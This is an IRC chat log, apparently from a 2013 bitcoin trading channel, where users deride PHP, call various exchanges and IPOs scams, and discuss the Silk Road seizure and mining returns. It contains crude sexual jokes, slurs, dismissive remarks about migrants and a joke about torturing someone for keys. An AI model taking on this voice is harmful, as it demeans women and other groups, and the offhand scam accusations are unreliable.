php Oct 04 18:28:15 "You pull out the hammer, but to your dismay, it has the claw part on both sides. Still serviceable though, I mean, you can hit nails with the middle of the head holding it sideways." Oct 04 18:28:55 this arguing as to why php is not the best tool to write nuclear power plant supervision tools and spacecraft controlsoftware entirely misses the point. Oct 04 18:29:08 php is intended to make the date show in a html page. Oct 04 18:29:20 no it's not. many languages can do that Oct 04 18:29:24 php is not more simple Oct 04 18:29:29 i am not saying it is more simple. Oct 04 18:29:30 hey hey i use it in my nuclear power plant Oct 04 18:29:42 it has no special features for the web Oct 04 18:29:46 i am not saying it does. Oct 04 18:30:02 pankkake is saying that it does the same thing as other languages, only worse. Oct 04 18:30:18 is this coint ipo on picostocks for real? Oct 04 18:30:20 only worse in ways and areas its userbase doesn't give a shit about. Oct 04 18:30:26 [BTCTC] [LABCOIN] 1612 @ 0.0002185 = 0.3522 BTC [-] Oct 04 18:30:31 deizel nothing on picostocks ios for real. Oct 04 18:30:35 pretty much. and I've used it a lot - this is why I hate it Oct 04 18:30:36 what language would you guys suggest Oct 04 18:30:45 +1 for python Oct 04 18:30:54 zoinky malbolge implemented in scheme. Oct 04 18:30:55 ugh Oct 04 18:30:55 i'd like to know before putting money into a hacked exchange written in cakephp that doesn't even have the securitycomponent enabled on the login screen Oct 04 18:31:20 deizel it's a scam since day one, this is well known, not much to see hiar. Oct 04 18:31:27 [BTCTC] [LABCOIN] 5000 @ 0.0002 = 1 BTC [-] Oct 04 18:31:34 i use php and nodejs in pretty much all my projects, im a huge fan of laravel Oct 04 18:38:44 silence o_O Oct 04 18:38:56 *tumbleweed* Oct 04 18:39:13 as i said, my nuclear power plant works fine on php. Oct 04 18:39:21 lol Oct 04 18:39:42 heh Oct 04 18:40:02 while pondering the calm, go buy my piddling few ATM options: http://mpex.co/?mpsic=O.USD.C125T Oct 04 18:40:02 bitcoin is coded in php, no? Oct 04 18:40:36 [HAVELOCK] [AM1] 2 @ 1 = 2 BTC [-] Oct 04 18:40:37 zoinky no, bitcoin is coded in c Oct 04 18:40:41 Why can't infrastructure managers use dedicated lines? Are they that keen on saving money that high risk infrastructure be connected to public networks? Oct 04 18:41:01 KRS1 public infrastructure is actually safer in principle. Oct 04 18:41:44 is php a scam? Oct 04 18:41:45 I disagree..that couldn't possibly be the case. Oct 04 18:44:09 KRS1 you secure your communication, not your channel. Oct 04 18:44:19 similarly, when you get married you're well advised to marry women you can trust Oct 04 18:44:36 rather than spend a lot on making the windows impenetrable and the doors unopenable. Oct 04 18:50:59 but that's more fun Oct 04 18:51:47 [MPEX] [O] [O.USD.C125T] 1 @ 0.3 BTC [+] Oct 04 18:54:43 married women doors are usually hard to penetrate Oct 04 18:55:56 not as hard as you'd think. Oct 04 18:56:14 well, unless you're not the husband of course Oct 04 19:04:53 Anyone know what this is all about? https://picostocks.com/stocks/view/31 cause it doesn't look legit http://i.imgur.com/ZMf6Lvt.png Oct 04 19:06:14 Kushedout http://log.bitcoin-assets.com/#340074 Oct 04 19:07:52 picostocks is the php of btc exchanges. Oct 04 19:10:46 There is nothing in the logs besides someone asking the same question and you bashing. Oct 04 19:11:03 "picostocks is a scam" Oct 04 19:11:08 that's what i gleaned Oct 04 19:11:23 unsure if true or not, but apparently the IPO is fraud Oct 04 19:15:11 [BTCTC] [LABCOIN] 3757 @ 0.0002199 = 0.8262 BTC [+] Oct 04 19:17:08 i'm not "bashing", newb. Oct 04 19:19:13 jcpham they had the 100th scam ipo and a bunch of others. par for the course. Oct 04 19:19:30 for various amounts of scam Oct 04 19:19:35 i thought all the ipo's were scams Oct 04 19:19:47 does the asset exchange really make it less or more of a scam Oct 04 19:20:34 some websites masquerading as exchanges specialise in listing scams/ Oct 04 19:20:44 picostocks thing is such a website masquerading as an exchange. Oct 04 19:24:19 [BTCTC] [LABCOIN] 2000 @ 0.00022 = 0.44 BTC [+] Oct 04 19:25:20 that's right buy all that labcoin Oct 04 19:27:55 is labcoin a scam or what? Oct 04 19:28:01 does ANYONE know the real story? Oct 04 19:28:23 [HAVELOCK] [KCIM] 2 @ 0.405 = 0.81 BTC [+] {2} Oct 04 19:28:24 [HAVELOCK] [HIM] 1 @ 0.14299991 BTC [-] Oct 04 19:29:36 doesn't matter. even if everything labcoin says is true it is still a scam Oct 04 19:29:37 this real story bs. Oct 04 19:29:42 amazing company is what it is. Oct 04 19:29:42 AMAZING COMPANY! Oct 04 19:30:17 what's the "real story" ? the movie of how some boy in ghana couldn't afford to buy his sweetheart shoes so he hatched a plan to build an internet paper empire ? Oct 04 19:31:05 so if slovenia means somalia ghana means italy?! Oct 04 19:32:42 lol got me there. Oct 04 19:32:45 i guess this is correct. Oct 04 19:33:21 btw, anyone saw the news item about the boatload of african refugees trying to get to europe that had no cellphones and since the boat was leaking Oct 04 19:33:31 they started a fire to get people's attention Oct 04 19:33:45 which burned their tub do the ground err... not to the ground really. to sea level. Oct 04 19:33:52 lol that was why? Oct 04 19:34:23 The disaster occurred when the boat's motor stopped working and the vessel began to take on water, Italian Interior Minister Angelino Alfano said. Oct 04 19:34:23 People on board burned a sheet to attract the attention of rescuers, starting a fire on board. Oct 04 19:34:29 [BTCTC] [LABCOIN] 790 @ 0.000226 = 0.1785 BTC [+] Oct 04 19:34:29 the real question is why would somalians want to go to italy Oct 04 19:34:40 because welfare state. Oct 04 19:35:09 of one of the most broke eu countries Oct 04 19:35:36 i suspect broke means different things in different places. Oct 04 19:35:37 but I get it - there are a lot of myths of money growing on trees Oct 04 19:35:58 besides, from italy they can get to monaco Oct 04 19:35:59 so we get migrants who go to France to get all that free money Oct 04 19:36:00 afaik once you're in the eu, you can wander off to some other eu country Oct 04 19:36:06 turns out, there is no such free money Oct 04 19:36:06 ^ Oct 04 19:38:15 pankkake at least there's free cheese. Oct 04 19:38:34 [MPEX] [S.MPOE] 2300 @ 0.00086947 = 1.9998 BTC [-] Oct 04 19:43:46 Is labcoin scam or not? Oct 04 19:44:40 [HAVELOCK] [NEOBEE] 150 @ 0.0029 = 0.435 BTC [-] {2} Oct 04 19:44:41 skinnkavaj http://log.bitcoin-assets.com/#340125 Oct 04 19:45:03 follow that link on the end! Oct 04 19:45:42 kakobrekla: oh wow thanks im on tv Oct 04 19:45:49 :D Oct 04 19:48:42 lol Oct 04 19:48:51 is this the result of the forum croaking ? Oct 04 19:49:05 dunno Oct 04 19:49:06 and incidentally, how come there's not a half dozen bitcoin busionessmen starting their own retardstalk ? Oct 04 19:49:15 maybe 5 or 10 users more here than regularly Oct 04 19:49:20 where have all the jesuses gone ? Oct 04 19:50:50 http://www.youtube.com/embed/8zrBQqs7waA Oct 04 19:50:51 Marlene Dietrich - Where have all the flowers gone? - YouTube Oct 04 19:56:52 [BTCTC] [LABCOIN] 1657 @ 0.000226 = 0.3745 BTC [+] Oct 04 19:57:53 [BTCTC] [LABCOIN] 1114 @ 0.00023409 = 0.2608 BTC [+] {2} Oct 04 19:58:54 [HAVELOCK] [AM100] 53 @ 0.00949799 = 0.5034 BTC [+] {2} Oct 04 19:59:11 every time I see a + on labcoin… http://totoz.eu/img/flu12345678 Oct 04 19:59:55 [HAVELOCK] [AM100] 14 @ 0.009498 = 0.133 BTC [+] Oct 04 20:00:56 [BTCTC] [FN] [DMS.SELLING] 486 @ 0.0052 = 2.5272 BTC [-] Oct 04 20:03:59 [BTCTC] [LABCOIN] 16820 @ 0.00025576 = 4.3019 BTC [+] {12} Oct 04 20:06:01 and incidentally, how come there's not a half dozen bitcoin busionessmen starting their own retardstalk ? <<<< I was pondering this while on the shitter this morning Oct 04 20:06:09 assbot: now you're just trying to get me mad Oct 04 20:06:13 great time for someone to dethrone btctalk Oct 04 20:06:21 ideally multiple someones. Oct 04 20:06:30 why would you want to create another forum? Oct 04 20:06:31 afaik that's theymos' idea anyway Oct 04 20:06:31 rumor is eligius is working on a new forum Oct 04 20:06:42 i told them i'd moderate if it doesn't suck Oct 04 20:06:45 the new forum that is Oct 04 20:06:55 moderators suck Oct 04 20:07:02 [MPEX] [S.MPOE] 3317 @ 0.00087238 = 2.8937 BTC [+] Oct 04 20:07:02 [BTCTC] [FN] [DMS.SELLING] 169 @ 0.00511927 = 0.8652 BTC [-] {3} Oct 04 20:07:07 and most forum software suck Oct 04 20:07:08 fisrt ban goes to pankkake Oct 04 20:07:12 everyone sucks in a forum Oct 04 20:07:20 jcpham: yay Oct 04 20:07:25 lolololo Oct 04 20:07:42 i support pre-banning Oct 04 20:07:57 there's a forum I've been on for 10+ years, I think I have been banned for 3 of those years Oct 04 20:07:58 ThickAsThieves: have you done all the btct -> other exhchange transfers? I know your busy, just curious Oct 04 20:08:03 [BTCTC] [LABCOIN] 670 @ 0.0002648 = 0.1774 BTC [+] {2} Oct 04 20:08:34 Doc, I just got home from 2 weeks of travelling Oct 04 20:08:40 you'll know when they are done Oct 04 20:08:51 i promise i won't keep it a secret ;) Oct 04 20:09:11 Awesome, not complaining at all. Just want to make sure I wasnt missed or if I messed something up =D Oct 04 20:09:12 How was Cyprus? Oct 04 20:09:18 basically it will be the bulk of my time for the next few days Oct 04 20:09:23 Cyprus was great Oct 04 20:09:27 jcpham some religious pricks forum eh? Oct 04 20:09:43 i wouldnt hang out with child molesters Oct 04 20:09:55 got to participate in a few days of meetings between Neo and partners, etc Oct 04 20:10:04 got to see the offices and storefront Oct 04 20:10:35 Cyprus itself was surprisingly dry Oct 04 20:10:36 Awesome! How's it look? Oct 04 20:10:42 the office look great Oct 04 20:10:44 (NeoBee) Oct 04 20:10:46 it's all nnew build Oct 04 20:10:50 very modern Oct 04 20:11:09 much bigger space than comes across in the photos Oct 04 20:12:43 Thats sweet Oct 04 20:13:08 [BTCTC] [B] [CIPHERMINE.B1] 19 @ 0.00827889 = 0.1573 BTC [-] {2} Oct 04 20:14:31 in re: bitcointalk, there is already https://www.bitcoinforum.com/ and i'm using it for coinbr support for quite some time Oct 04 20:14:56 now if everyone stopped ignoring its existence... Oct 04 20:15:11 but why would we use that forum? Oct 04 20:16:00 jurov who's running it ? Oct 04 20:16:54 omfg all the icons and shit. Oct 04 20:17:03 this forum is giving me dyslexia. Oct 04 20:17:31 you can sign up with your "social media account", yay Oct 04 20:17:51 i did not research their backgroud... even if it's UC, i don't care Oct 04 20:18:14 dude was nice, made me subforum with admin access and that's all i needed Oct 04 20:19:57 well here's to hoping there'll be a bunch of these and that's tyhat. Oct 04 20:20:15 [MPEX] [S.MPOE] 1100 @ 0.00087238 = 0.9596 BTC [+] Oct 04 20:20:35 lol giving you dyslexia Oct 04 20:21:08 free muay thai skin for lol for anyone that's interested: Oct 04 20:21:10 http://na.alienwarearena.com/giveaways/muay-thai-lee-sin-groups-giveaway Oct 04 20:21:40 i wouldnt mind if the concept of the "official forum thread" went away Oct 04 20:22:31 nice lewicki - love me some jungle Lee Sin. Oct 04 20:23:31 ThickAsThieves, nor would I Oct 04 20:24:33 and re the trillionaire, mpex made me temporarily rich to some 10^20 magnitude.. no bank can come close Oct 04 20:24:43 banks dont use bigints Oct 04 20:25:21 jurov: judging by the 'trillionaire' snafu, they still use BCD. Oct 04 20:27:17 http://www.hardwarecanucks.com/news/video/amd-puts-r9-290x-pre-orders-live-asks-for-200-deposit/ litecoin mining has its preorders too! Oct 04 20:27:18 AMD Puts R9-290X Pre-Orders Live; Asks for $200 Deposit | Hardware Canucks Oct 04 20:27:26 ThickAsThieves it's a liability anyway, all the scammers paying you five btc or w/e to have the airs of respectability... not so good. Oct 04 20:29:15 classical math problem : Oct 04 20:30:03 "Triginta tibi sunt pueri totidemque puellae: Una est nec surgit mentula. Quid facies?" Oct 04 20:30:25 [HAVELOCK] [VTX] 1 @ 0.36000001 BTC [-] Oct 04 20:30:37 roughly speaking, "you've got thirty boys and that many girls. you've got one cock and it won't stand up. what to do ?" Oct 04 20:35:03 have its connection reset by peer? Oct 04 20:36:31 [MPEX] [S.MPOE] 300 @ 0.00087238 = 0.2617 BTC [+] Oct 04 20:37:13 !ticker m ^OIX Oct 04 20:37:14 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 89.5310801 / 103.17256816 / 221.93443406 (19 shares, 7.95 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Oct 04 20:37:32 lol Oct 04 20:37:32 [BTCTC] [ASICMINER-PT] 7 @ 1.01428571 = 7.1 BTC [+] {4} Oct 04 20:38:33 [HAVELOCK] [HIM] 1 @ 0.14299991 BTC [-] Oct 04 20:40:02 https://bitcoinera.net/ 6% monthly interest.. who is this? Oct 04 20:40:03 Bitcoin Wallet | Online Bitcoin Wallet & Investing in Bitcoin - 6% monthly on your bitcoin deposits Oct 04 20:40:35 [BTCTC] [ASICMINER-PT] 2 @ 1.0275 = 2.055 BTC [+] {2} Oct 04 20:40:40 proudly writte in PHP Oct 04 20:41:28 PHP IS FOR PLEBS Oct 04 20:41:42 proudly, really? :/ Oct 04 20:41:54 Contact Person: Christoph Zeras Oct 04 20:42:07 Address:444 Brickell Ave Miami Florida Oct 04 20:42:28 Regretfully written in PHP Oct 04 20:42:37 [HAVELOCK] [AM100] 46 @ 0.00858109 = 0.3947 BTC [-] {3} Oct 04 20:42:40 phone's there. too Oct 04 20:42:57 "We express our condoleances to ourselves for having made this website." Oct 04 20:43:39 [HAVELOCK] [AM100] 104 @ 0.00851046 = 0.8851 BTC [-] {4} Oct 04 20:43:39 "6% monthly", "low risk" Oct 04 20:44:31 Of course bitcoinera.net also offers industry standard security, SSL certificates, AES hard disk encryption, hashed passwords, offline cold storage and transaction PINs which makes it one of the most secure online bitcoin wallets available. Oct 04 20:44:43 derp. Oct 04 20:45:03 incidentally, for all the roiling against php i can't believe nobody's saying anything about ubuntu's gedit. Oct 04 20:45:09 "industry standard" we know so well what's bitcoin industry standard Oct 04 20:45:18 i do not think i have seen a more braindamaged piece of software since the days of windows 3.1 Oct 04 20:45:35 you can avoid it unlike php Oct 04 20:45:43 ;;google bitdaytrade industry standard Oct 04 20:45:44 Alberto Armandi - Hong Kong | LinkedIn: ; Bitcoin Websites - Google Drive - Google Docs: Oct 04 20:46:21 jurov i thought people objected at other people using it. Oct 04 20:46:59 AA's reality is distorted Oct 04 20:47:46 somewha Oct 04 20:47:48 t Oct 04 20:48:44 [HAVELOCK] [VTX] 23 @ 0.36000001 = 8.28 BTC [-] Oct 04 20:50:46 [HAVELOCK] [AM1] 1 @ 1.09 BTC [+] Oct 04 20:51:47 [HAVELOCK] [HIM] 39 @ 0.14299991 = 5.577 BTC [-] Oct 04 20:57:43 damn pigeons Oct 04 20:57:53 [BTCTC] [FN] [BTC-GROWTH] 103 @ 0.08479912 = 8.7343 BTC [+] {4} Oct 04 20:59:26 I wouldn't trust it, it does not have "Protected against SQL injections by escaping all possible user input" in its serucity measures Oct 04 20:59:55 [BTCTC] [FN] [BTC-GROWTH] 15 @ 0.08499 = 1.2749 BTC [+] Oct 04 20:59:55 [MPEX] [S.MPOE] 5733 @ 0.00087182 = 4.9981 BTC [-] {2} Oct 04 21:00:24 6% a month, new PIBOR rate Oct 04 21:00:35 pewpewbor Oct 04 21:04:21 lol isn't mpex.co written in php? Oct 04 21:04:33 buildin' tables with echo statements mr. popescu Oct 04 21:05:01 [MPEX] [S.MPOE] 3050 @ 0.00086492 = 2.638 BTC [-] {2} Oct 04 21:05:46 malboge Oct 04 21:06:26 befunge. Oct 04 21:07:01 is that stack based malboge ? Oct 04 21:09:18 2d grid instead of linear flow. Oct 04 21:09:30 http://esolangs.org/wiki/Befunge Oct 04 21:09:31 Befunge - Esolang Oct 04 21:09:40 o Oct 04 21:13:15 Malbolge was so difficult to understand when it arrived that it took two years for the first Malbolge program to appear. The first Malbolge program was not written by a human being, it was generated by a beam search algorithm designed by Andrew Cooke and implemented in Lisp.[1] Oct 04 21:20:14 [BTCTC] [B] [CIPHERMINE.B1] 113 @ 0.0082 = 0.9266 BTC [-] Oct 04 21:27:42 lol but having useful code written in malbolge... maybe it could be treated as black box then Oct 04 21:28:32 but perhaps imprisonment and torture of phd students must me involved Oct 04 21:28:38 jurov or the fbi could ask for the keys. Oct 04 21:29:29 what keys? when the programmers will get insane, not even fbi will get keys Oct 04 21:30:12 but maybe they'll waterboard knuth in turn... Oct 04 21:30:31 or hire reiser Oct 04 21:30:46 just saw this update if anyone is an ADDICTION holder. --- Some good news at last! As we speak, 9 miners are on their way to our datacenter. Since we don't trust UPS ;) (and UPS does not deliver on the weekends) we are picking them up ourselves :) We picked them up this afternoon so they should arrive in the morning (European time) where we will have them hashing asap! Oct 04 21:31:15 ieatcows: how many ths? Oct 04 21:32:30 the summary says 4.2 TH but I'm not sure if they factored in the fact that the KNC miners do more than 500 GH since they wrote the summary Oct 04 21:36:57 ;;bc,stats Oct 04 21:36:59 Current Blocks: 261707 | Current Difficulty: 1.4881919980509263E8 | Next Difficulty At Block: 262079 | Next Difficulty In: 372 blocks | Next Difficulty In About: 2 days, 1 hour, 36 minutes, and 0 seconds | Next Difficulty Estimate: 184991384.841 | Estimated Percent Change: 24.30613 Oct 04 21:38:33 so there's a new mpex asset : http://mpex.co/?mpsic=S.NSA Oct 04 21:38:39 next 2 weeks: 5 min blocks? Oct 04 21:38:48 lol NSA Oct 04 21:39:12 whee Oct 04 21:39:34 [HAVELOCK] [AM100] 34 @ 0.00852001 = 0.2897 BTC [-] Oct 04 21:39:41 i plan to make a post tomorrow detailing what the plan is, Oct 04 21:39:52 but if anyone has questions good idea to ask anyway. Oct 04 21:40:06 so, what is this thing? Oct 04 21:40:22 fuck that i'm not beggin for an explanation Oct 04 21:40:34 pankkake a manufacturer of crypto items Oct 04 21:40:57 could you be more vague? Oct 04 21:41:28 he can. Oct 04 21:41:35 I have no doubts Oct 04 21:41:36 yeah but it'd take straining Oct 04 21:42:00 anyway, we know all that is needed is a name and a logo Oct 04 21:42:04 it's what it is tho, make integrated hardware-and-software products that make absolute guarantees Oct 04 21:42:33 such as, "as long as you use gizmo X, there is no way for anyone to listen in to your coversation. no matter what." Oct 04 21:43:02 or "as long as you use gizmo Y, your data will be absolutely destroyed if you fart. no exceptions." Oct 04 21:43:16 not sure if to laugh or cry Oct 04 21:43:51 so things that free software can do better anyway? Oct 04 21:44:05 this would include hardware and software, for one. Oct 04 21:44:47 and for the other, take lavabit as a convenient example. the theoretical privacy offered by the service depended on a godaddy ssl cert and the owner's resistance to fbi court orders. Oct 04 21:45:12 the idea is to make objects which depend on no externality. as long as they function, they function securely, and this as a matter of fact rather than convention. Oct 04 21:45:19 no hosted email service can guarantee privacy Oct 04 21:45:23 exactly. Oct 04 21:45:37 so, a home email server, for example? Oct 04 21:45:55 I've seen projects like that, interesting, but sadly not going anywhere Oct 04 21:45:58 something like that would theoretically qualify, i suppose. Oct 04 21:46:24 pankkake: more like a spoon. the latter is guaranteed not to stab you in the eye spontaneously, if used as prescribed. by pure physical fact of it being what it is. Oct 04 21:46:36 https://github.com/Bit-Wasp/BitWasp Oct 04 21:47:03 go! Oct 04 21:47:04 > php Oct 04 21:47:24 "BitWasp is an open source project which aims to lower the barrier for anyone to set up there own secure, anonymous marketplace. " Oct 04 21:47:25 great aim. Oct 04 21:47:26 php can kick you off this chan Oct 04 21:47:42 the lower the barriers the better the movie. bring popcorns. Oct 04 21:47:45 also, CodeIgniter Oct 04 21:48:21 well, the SR fiasco tells us that the marketplace admin should be highly knowledgable Oct 04 21:48:40 make it some easy php thing, and it's going to be a lot of failures Oct 04 21:48:43 [HAVELOCK] [AM1] 1 @ 1.08 BTC [-] Oct 04 21:49:51 the only way I could see it working, is that if it came with professional support Oct 04 21:50:14 from whom. Oct 04 21:50:20 the developers Oct 04 21:50:28 pankkake http://trilema.com/2012/probably-the-hottest-business-idea-of-the-moment-in-btc/ Oct 04 21:50:31 that was 2012. Oct 04 21:50:49 pankkake: does a spoon come with professional support? believe it or not, it is possible to build an artifact which functions as described, until it is physically destroyed. Oct 04 21:50:56 ah well, I thought about it a few days ago Oct 04 21:51:13 "All help and contributions in getting Bitwasp completed are very much appreciated as the time of the lead developers is currently very limited." Oct 04 21:51:18 asciilifeform: I'm not talking about your idea, but about bitwasp Oct 04 21:51:39 though if it's software, you have the issue of updating it Oct 04 21:52:01 i wonder if there's some underground forum distributing teenage cunt and assorted pills to people on the basis of how many lead developer roles they fail to fill. Oct 04 21:52:20 pankkake: when's the last time you updated the software in your microwave oven? Oct 04 21:52:34 you know it's not the same thing Oct 04 21:52:44 and the microwave does not take complex imput from strangers Oct 04 21:52:47 [HAVELOCK] [AM100] 134 @ 0.00914463 = 1.2254 BTC [+] {3} Oct 04 21:53:13 okay, when's the last time you updated the software in your girlfriend ? Oct 04 21:53:24 mircea_popescu: pretty much all those community project fail. see diaspora for one of the best examples Oct 04 21:53:35 no argument. Oct 04 21:53:47 mircea_popescu: I wish that was possible, because they were all very defective Oct 04 21:53:48 [HAVELOCK] [AM100] 84 @ 0.00949797 = 0.7978 BTC [+] {2} Oct 04 21:54:07 beta versions I guess Oct 04 21:54:20 lol Oct 04 21:54:49 [HAVELOCK] [AM100] 170 @ 0.00949887 = 1.6148 BTC [+] Oct 04 21:55:44 vaguely related : http://trilema.com/2009/de-interfonibus/ 2009 article explaining how to hack in the building access intercom so as to get other people's calls. Oct 04 21:57:13 I haven't been able to figure out what OpenTranscations actually is Oct 04 21:58:28 me either. i've probably been at it longer than you. i think we will die and it will endure mysterious. Oct 04 22:00:48 pankkake, as in mtgox's withdrawal form ? Oct 04 22:00:53 Just found a couple bitcoins in an old BitStamp account, they won't let me withdraw until I do AML Oct 04 22:01:11 Apocalyptic: http://opentransactions.org/ Oct 04 22:01:17 pretty retarded considering that I never actually bought or sold btc with the account Oct 04 22:01:56 [HAVELOCK] [LABCO] 199 @ 0.00084192 = 0.1675 BTC [+] {4} Oct 04 22:03:19 ThickAsThieves: do they force it for the Ripple widthdrawal too? Oct 04 22:03:49 dunno Oct 04 22:03:56 i'm not gonna try and find out Oct 04 22:03:58 [MPEX] [S.MPOE] 5144 @ 0.0008719 = 4.4851 BTC [+] {3} Oct 04 22:04:03 gonna do AML Oct 04 22:04:21 I realized with this recent crash I need more quick ways to trade Oct 04 22:04:52 I'm still trying to reverify my bitcoin-central account, they seem to want a new document every day Oct 04 22:04:59 [BTCTC] [ASICMINER-PT] 2 @ 1.03 = 2.06 BTC [+] Oct 04 22:05:02 lol Oct 04 22:05:10 most of them being very easy to fake, but whatever Oct 04 22:06:28 fake documents are bad mmkay ? Oct 04 22:07:01 [HAVELOCK] [AM100] 50 @ 0.00999899 = 0.4999 BTC [+] Oct 04 22:07:04 > trusting a piece of paper Oct 04 22:07:07 i often wonder if all the jokers demanding documents are doing so to feed honeypots like the late SR Oct 04 22:07:32 BitFunder will probly be next Oct 04 22:07:43 Weex already allows AML submission Oct 04 22:07:55 inevitably some moron succumbs to the temptation of buying false papers, he buys from a stoolie; and game over. Oct 04 22:09:03 [BTCTC] [ASICMINER-PT] 1 @ 1.03 BTC [+] Oct 04 22:09:09 bitstamp did this step like 2 months ago or so Oct 04 22:10:00 by the way ThickAsThieves: do you still process btct am -> am1? Oct 04 22:10:14 Yes Oct 04 22:10:27 good to know, thanks Oct 04 22:10:40 asciilifeform indeed it was never explained just how the fake ids dpr guy bought were discovered in the mail. Oct 04 22:10:48 just you know... glossed over. Oct 04 22:11:05 [MPEX] [S.MPOE] 437 @ 0.00087387 = 0.3819 BTC [+] Oct 04 22:13:16 mircea_popescu: possibly something like this: http://www.wired.com/threatlevel/2013/07/open-market/ Oct 04 22:14:34 no need to 'discover' anything when a stoolie is in fact doing the forgeries. Oct 04 22:17:11 ThickAsThieves: is there a cutoff date for transfers? Oct 04 22:17:36 well BTCT closes on Monday right? Oct 04 22:17:46 so this weekend would make sense Oct 04 22:18:09 yes and afaik burnside is going to convert all remaining shares to direct shares on the 10th Oct 04 22:18:19 weekend is fine :) Oct 04 22:26:21 [MPEX] [S.MPOE] 1850 @ 0.00086702 = 1.604 BTC [-] Oct 04 22:30:25 [BTCTC] [ASICMINER-PT] 1 @ 1 BTC [-] Oct 04 22:31:52 so, the SR BTC is to be liquidated? http://www.forbes.com/sites/kashmirhill/2013/10/04/fbi-silk-road-bitcoin-seizure/ Oct 04 22:32:35 lol he gave them the keys ? Oct 04 22:32:57 "The FBI has not been able to get to Ulbricht’s personal Bitcoin yet. “That’s like another $80 million worth,” she said, explaining that it was held separately and is encrypted." Oct 04 22:33:04 yes, he seems to make it a point of doing everything wrong Oct 04 22:33:21 hm, that's better Oct 04 22:33:28 [BTCTC] [BMF] 9 @ 0.0151 = 0.1359 BTC [+] Oct 04 22:34:07 big deal, rectothermal cryptoanalysis until he upchucks the key. Oct 04 22:34:22 asciilifeform it;s not worth it to them. Oct 04 22:34:39 didn't say it will be a government official inserting the iron Oct 04 22:34:39 well, if I had that much bitcoins, I'd use passwordless security Oct 04 22:35:00 just whoever has unsupervised access to DPR's sorry carcass in the near future. Oct 04 22:35:43 mebbe. Oct 04 22:36:20 redditors went all "it will pay the gov debt" Oct 04 22:36:37 pankkake: it will go to the same place where the cocaine went. Oct 04 22:37:31 [BTCTC] [ASICMINER-PT] 1 @ 1.03 BTC [+] Oct 04 22:38:44 wouldn't it be funny if the 27k btc walked away sometime? Oct 04 22:38:57 https://blockchain.info/address/1F1tAaz5x1HUXrCNLbtMDqcw6o5GNn4xqX Oct 04 22:38:58 Bitcoin Address 1F1tAaz5x1HUXrCNLbtMDqcw6o5GNn4xqX Oct 04 22:39:21 the irony, of course, is that so far this quite strengthens bitcoin. Oct 04 22:39:38 on one hand, the govt taking the trouble to peel some of the bottom layers of idiot muppets off btc is great. Oct 04 22:39:46 on the other, 30k less btc can't hurt anything. Oct 04 22:39:50 ^ Oct 04 22:39:59 When I saw "liquidate" I was happy. Oct 04 22:40:09 what does liquidate mean? Oct 04 22:40:27 Exterminate, exterminate, exterminate! Oct 04 22:41:08 anyway, it certainly be a manual of "what not to do" for the next silk roads Oct 04 22:41:14 fucking daleks, the lot of you. Oct 04 22:41:21 ;) Oct 04 22:41:35 [MPEX] [S.MPOE] 1800 @ 0.00086826 = 1.5629 BTC [+] {2} Oct 04 22:41:36 Hey doesn't anyone think ADDICTION on bitfunder is a great buy? The kncminers are arriving, they just posted news. Has anyone done any calculations how much those shares can make in divends lately? Oct 04 22:41:53 skinnkavaj: do it yourself Oct 04 22:42:02 skinnkavaj nobody seemed to have cared so far. Oct 04 22:42:05 pankkake: Trying Oct 04 22:42:09 http://mining.thegenesisblock.com/ Oct 04 22:42:13 Mining Dashboard - The Genesis Block Oct 04 22:42:15 "can some1 maths 4 meh plox thnx" Oct 04 22:42:16 Reading cached version of bitcointalk now Oct 04 22:42:19 Please help me calculate Oct 04 22:43:02 pankkake actually that;'s a pretty nice link. Oct 04 22:43:02 I'm pretty sure no one is going to sell it at a good price for you anyway Oct 04 22:43:18 mircea_popescu: it's the *only* calculator that doesn't suck Oct 04 22:43:20 1 share is 32mhash Oct 04 22:43:37 or the one that sucks the less Oct 04 22:43:39 Where can i find calculator for how much 1mhash will bring in? Oct 04 22:43:43 Bitfury (EU) 0.78 / Bitfury (EU) 0.15 Oct 04 22:43:44 da fuck ? Oct 04 22:43:48 it's not normalised or somerthing ? Oct 04 22:44:48 ;;genrate 32000 Oct 04 22:44:51 The expected generation output, at 32000.0 Mhps, given difficulty of 148819199.805, is 0.108137985871 BTC per day and 0.00450574941127 BTC per hour. Oct 04 22:45:46 bejesus, 320 gh/s makes 1 btc a day. Oct 04 22:45:54 Seems not worth it Oct 04 22:45:59 with current share price Oct 04 22:46:00 i remember when the entire network was like, 30gh Oct 04 22:47:15 http://mining.thegenesisblock.com/a/d1afeb43fa if I'm not mistaken, at 0.01 a share of 32 mhash, it's a loss Oct 04 22:47:21 Mining Dashboard - The Genesis Block Oct 04 22:50:44 [BTCTC] [CRYPTO-TRADE] 1 @ 0.17 BTC [-] Oct 04 22:50:47 if I ever encounter a time machine, the only thing I'd bring with me is a block erupter Oct 04 22:52:46 [HAVELOCK] [B] [XBOND] 1000 @ 0.001216 = 1.216 BTC [-] {2} Oct 04 22:52:47 [MPEX] [S.MPOE] 1400 @ 0.00086702 = 1.2138 BTC [-] Oct 04 22:53:37 so is this BitFury marketplace TradeFortress' new thing? Oct 04 22:54:10 https://www.cex.io/promo/?src=bitv Oct 04 22:54:59 "CEX.IO is the first and leading commodity exchange in the Bitcoin community. Here you can buy or sell GHashes" Oct 04 22:55:08 duide the bullshit. it's the fourth generation. Oct 04 22:55:37 bitcoin is a commodity bro! Oct 04 22:55:38 Ukto tried to run something called hashpower after pirate's coin minter scam support thing floundered, and THAT was 2nd generation Oct 04 22:56:26 but it didnt work Oct 04 22:56:26 by now this "we're the first" and the "we're the largest" markers are pretty clear indications of dipshit 20something year old deadpirateroberts-ism. Oct 04 22:56:30 cause it was no ponzi powered Oct 04 22:56:38 that isnt the first- gpumax did that Oct 04 22:57:14 if it is TF's thing, he paid like 210btc to advertise in btctalk Oct 04 22:57:19 waste of money Oct 04 22:57:30 O_o Oct 04 22:57:33 what is btctalk? Oct 04 22:57:38 never heard of it Oct 04 22:57:39 forum Oct 04 22:57:40 what is btc? Oct 04 22:57:49 ? Oct 04 22:57:52 scam Oct 04 22:57:52 ?? Oct 04 22:57:54 never heard of it Oct 04 22:57:59 butcointalk Oct 04 22:58:04 what is heard? Oct 04 22:58:12 who is this is? Oct 04 22:58:21 lmao 210 btc ? srsly ?! Oct 04 22:58:33 yeah he bought 7 spots at 30btcv ea Oct 04 22:58:39 there's something amiss here. that thing isn't going to make 200 btc over its lifetime. Oct 04 22:58:39 lol yup Oct 04 22:58:56 this is called bflism Oct 04 22:59:00 bashing those ads Oct 04 22:59:02 unless he's also selling his own stuff? Oct 04 22:59:06 my guess is he urgently wanted to get it out there due 